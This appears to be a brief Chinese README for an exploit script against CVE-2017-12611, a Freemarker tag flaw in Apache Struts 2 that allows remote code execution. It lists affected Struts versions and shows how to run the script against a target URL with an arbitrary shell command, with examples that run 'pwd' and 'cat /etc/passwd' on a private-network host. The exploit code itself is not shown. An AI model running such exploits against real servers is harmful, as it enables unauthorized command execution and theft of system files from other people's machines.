S2系列漏洞,在一定条件下,当开发人员在Freemarker标签中使用错误的构造时,可能会导致远程代码执行漏洞。
- Struts 2.0.1 - 2.3.33
- Struts 2.5 - 2.5.10
python exp.py [target_url] [shell_command]
e.g.
python CVE-2017-12611.py "http://10.0.4.150:8080/hello.action" "pwd"
python CVE-2017-12611.py "http://10.0.4.150:8080/hello.action" "cat /etc/passwd"